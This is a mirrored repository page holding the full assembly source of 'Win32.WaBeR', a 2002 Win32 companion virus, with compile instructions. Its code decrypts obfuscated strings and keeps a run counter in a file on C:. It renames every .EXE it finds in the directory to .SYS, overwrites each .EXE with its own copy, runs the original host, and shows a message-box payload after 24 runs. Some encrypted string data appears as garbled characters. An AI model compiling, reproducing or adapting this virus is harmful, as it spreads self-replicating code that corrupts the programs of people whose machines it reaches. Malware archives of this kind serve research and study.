mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-29 22:45:27 +00:00
321 lines
6.5 KiB
NASM
321 lines
6.5 KiB
NASM
;===========================================================================================
|
||
; ...:: Win32.WaBeR - ViruS ::...
|
||
; Version 2.4
|
||
; by -DiA- (c) 02
|
||
; GermanY
|
||
;
|
||
;
|
||
;
|
||
; Here it is! My 1st Win32.Companion Virus ...success!!! :)
|
||
; Don't grumble about the code, it's my 2th Win32.Virus... ...and I go on. =)
|
||
; DiA_hates_machine@gmx.de
|
||
;
|
||
;
|
||
;
|
||
; Some Comments:
|
||
; -decrypt the strings
|
||
; -read the counter >not exist = MAKE IT!
|
||
; >if not 0 = go to the virus and infect some files
|
||
; >if 0 = jmp to PAYLOAD
|
||
; -payload:
|
||
; +after 24 starts the payload aktivate
|
||
; +it prints a nice message:
|
||
; ...:Weed And BEer Rulez:...
|
||
; Win32.WaBeR - ViruS
|
||
; Version 2.4
|
||
; by -DiA- (c)02
|
||
; [PLEASE RESET THE WaBeR-COUNTER : "C:\WaBeR.dll"]
|
||
; -virus renames found .EXE to .SYS file
|
||
; -virus copy itself to the .EXE file
|
||
; -after work the host runs!
|
||
; -allright...
|
||
;
|
||
;
|
||
; Greetz to Monochrom - without you, this virus can't live :)
|
||
;
|
||
;
|
||
; To Compile the WaBeR - ViruS:
|
||
; tasm32 /z /ml /m3 WaBeR24,,;
|
||
; tlink32 -Tpe -c WaBeR24,WaBeR24,, import32.lib
|
||
;
|
||
; To Compile the WaBeR - SYS:
|
||
; tasm32 /z /ml /m3 WaBeR24sys,,;
|
||
; tlink32 -Tpe -c WaBeR24sys,WaBeR24sys,, import32.lib
|
||
; rename WaBeR24sys.exe WaBeR24.sys
|
||
;===========================================================================================
|
||
|
||
|
||
;*******************************************************************************************
|
||
;*****cut*****WaBeR24.sys*******************************************************************
|
||
;.386
|
||
;.model flat
|
||
;jumps
|
||
;
|
||
;extrn MessageBoxA:PROC
|
||
;extrn ExitProcess:PROC
|
||
;
|
||
;.data
|
||
;titel db '1st Generation',0
|
||
;msg db 'Win32.WaBeR - Virus',10,13
|
||
; db 'Version 2.4',10,13
|
||
; db 'by -DiA- (c)02',10,13
|
||
; db '[my 1st companion virus in win32]',0
|
||
;
|
||
;.code
|
||
;start:
|
||
;
|
||
;push 16
|
||
;push offset titel
|
||
;push offset msg
|
||
;push 0
|
||
;call MessageBoxA
|
||
;
|
||
;push 0
|
||
;call ExitProcess
|
||
;
|
||
;end start
|
||
;*****cut*****WaBeR24.sys*******************************************************************
|
||
;*******************************************************************************************
|
||
|
||
|
||
;=====Have Fun...===========================================================================
|
||
.386
|
||
.model flat
|
||
jumps
|
||
|
||
extrn GetCommandLineA:PROC
|
||
extrn lstrcpyA:PROC
|
||
extrn FindFirstFileA:PROC
|
||
extrn CopyFileA:PROC
|
||
extrn FindNextFileA:PROC
|
||
extrn CreateProcessA:PROC
|
||
extrn ExitProcess:PROC
|
||
extrn MessageBoxA:PROC
|
||
extrn OpenFile:PROC
|
||
extrn CreateFileA:PROC
|
||
extrn WriteFile:PROC
|
||
extrn ReadFile:PROC
|
||
extrn CloseHandle:PROC
|
||
extrn SetFilePointer:PROC
|
||
|
||
.data
|
||
FileName db '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',-70
|
||
titel db '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ޚ<EFBFBD><DE9A>ޚ<EFBFBD><DE9A><EFBFBD>Ț<EFBFBD><C89A><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',-70
|
||
msg db '<27><>ԉ<EFBFBD><D489><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蚗<EFBFBD><E89A97><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',-80,-73
|
||
db '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ԛ<EFBFBD><D49A><EFBFBD>',-80,-73
|
||
db '<27>Ú<EFBFBD><C39A><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ٓ<EFBFBD><D993>',-80,-73,-80,-73,-80,-73
|
||
db '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蚀<EFBFBD><E89A80><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>֘<EFBFBD>',-70
|
||
FirstNum db '<27>',-70
|
||
FileMask db '<27><><EFBFBD><EFBFBD><EFBFBD>',-70
|
||
Number db 01d dup (0)
|
||
FileAttr dd 0
|
||
FileHandle dd 0
|
||
Read dd 0
|
||
Write dd 0
|
||
FindHandle dd 0
|
||
ProcessInfo dd 4 dup (0)
|
||
StartupInfo dd 4 dup (0)
|
||
Win32FindData dd 0,0,0,0,0,0,0,0,0,0,0
|
||
FindFile db 200 dup (0)
|
||
CreateFile db 200 dup (0)
|
||
VirusFile db 200 dup (0)
|
||
OriginFile db 200 dup (0)
|
||
|
||
|
||
.code
|
||
start:
|
||
|
||
;-----Decrypt all Strings-------------------------------------------------------------------
|
||
mov esi,offset FileName
|
||
mov edi,esi
|
||
mov ecx,154d
|
||
call DeCrypt
|
||
;-------------------------------------------------------------------------------------------
|
||
|
||
;-----Check the Counter---------------------------------------------------------------------
|
||
push 2
|
||
push offset FileAttr
|
||
push offset FileName
|
||
call OpenFile
|
||
|
||
cmp eax,0FFFFFFFFh
|
||
je MakeFile
|
||
|
||
mov dword ptr [FileHandle],eax
|
||
|
||
GOon:
|
||
call SetPointer
|
||
|
||
push 0
|
||
push offset Read
|
||
push 01d
|
||
push offset Number
|
||
push dword ptr [FileHandle]
|
||
call ReadFile
|
||
|
||
cmp byte ptr [Number],'0'
|
||
je BOOM
|
||
|
||
dec byte ptr [Number]
|
||
|
||
call SetPointer
|
||
|
||
push 0
|
||
push offset Write
|
||
push 01d
|
||
push offset Number
|
||
push dword ptr [FileHandle]
|
||
call WriteFile
|
||
|
||
push dword ptr [FileHandle]
|
||
call CloseHandle
|
||
jmp WaBeR
|
||
|
||
MakeFile:
|
||
push 0
|
||
push 80h
|
||
push 2
|
||
push 0
|
||
push 0
|
||
push 0C0000000h
|
||
push offset FileName
|
||
call CreateFileA
|
||
|
||
mov dword ptr [FileHandle],eax
|
||
|
||
call SetPointer
|
||
|
||
push 0
|
||
push offset Write
|
||
push 01d
|
||
push offset FirstNum
|
||
push dword ptr [FileHandle]
|
||
call WriteFile
|
||
|
||
jmp GOon
|
||
|
||
BOOM:
|
||
push dword ptr [FileHandle]
|
||
call CloseHandle
|
||
|
||
push 16
|
||
push offset titel
|
||
push offset msg
|
||
push 0
|
||
call MessageBoxA
|
||
jmp exit
|
||
|
||
SetPointer:
|
||
push 0
|
||
push 0
|
||
push 0
|
||
push dword ptr [FileHandle]
|
||
call SetFilePointer
|
||
ret
|
||
;-------------------------------------------------------------------------------------------
|
||
|
||
;-----Decrypt Loop--------------------------------------------------------------------------
|
||
DeCrypt:
|
||
lodsb
|
||
xor al,69d
|
||
not al
|
||
stosb
|
||
loop DeCrypt
|
||
ret
|
||
;-------------------------------------------------------------------------------------------
|
||
|
||
;-----Infect some Filez---------------------------------------------------------------------
|
||
WaBeR:
|
||
|
||
call GetCommandLineA
|
||
|
||
push eax
|
||
push offset VirusFile
|
||
call lstrcpyA
|
||
|
||
mov eax,offset VirusFile
|
||
GetPoint1:
|
||
cmp byte ptr [eax],'.'
|
||
jz FoundPoint1
|
||
inc eax
|
||
jmp GetPoint1
|
||
|
||
FoundPoint1:
|
||
add eax,04d
|
||
mov byte ptr [eax],00
|
||
|
||
push offset VirusFile+1
|
||
push offset OriginFile
|
||
call lstrcpyA
|
||
|
||
mov eax,offset OriginFile
|
||
GetPoint2:
|
||
cmp byte ptr [eax],'.'
|
||
jz FoundPoint2
|
||
inc eax
|
||
jmp GetPoint2
|
||
|
||
FoundPoint2:
|
||
inc eax
|
||
mov dword ptr [eax],535953h
|
||
|
||
push offset Win32FindData
|
||
push offset FileMask
|
||
call FindFirstFileA
|
||
mov dword ptr [FindHandle],eax
|
||
|
||
FindNext:
|
||
cmp eax,-1
|
||
je RunHost
|
||
or eax,eax
|
||
jz RunHost
|
||
|
||
push offset FindFile
|
||
push offset CreateFile
|
||
call lstrcpyA
|
||
|
||
mov eax,offset CreateFile
|
||
GetPoint3:
|
||
cmp byte ptr [eax],'.'
|
||
jz FoundPoint3
|
||
inc eax
|
||
jmp GetPoint3
|
||
|
||
FoundPoint3:
|
||
inc eax
|
||
mov dword ptr [eax],535953h
|
||
|
||
push 1
|
||
push offset CreateFile
|
||
push offset FindFile
|
||
call CopyFileA
|
||
|
||
push 0
|
||
push offset FindFile
|
||
push offset VirusFile+1
|
||
call CopyFileA
|
||
|
||
push offset Win32FindData
|
||
push dword ptr [FindHandle]
|
||
call FindNextFileA
|
||
jmp FindNext
|
||
|
||
RunHost:
|
||
push offset ProcessInfo
|
||
push offset StartupInfo
|
||
push 0
|
||
push 0
|
||
push 00000010h
|
||
push 0
|
||
push 0
|
||
push 0
|
||
push offset OriginFile
|
||
push offset OriginFile
|
||
call CreateProcessA
|
||
|
||
exit:
|
||
push 0
|
||
call ExitProcess
|
||
;-W-E-E-D--A-N-D--B-E-E-R--R-U-L-E-Z-----DiA------------------------------------------------
|
||
end start
|
||
;=========================================================================================== |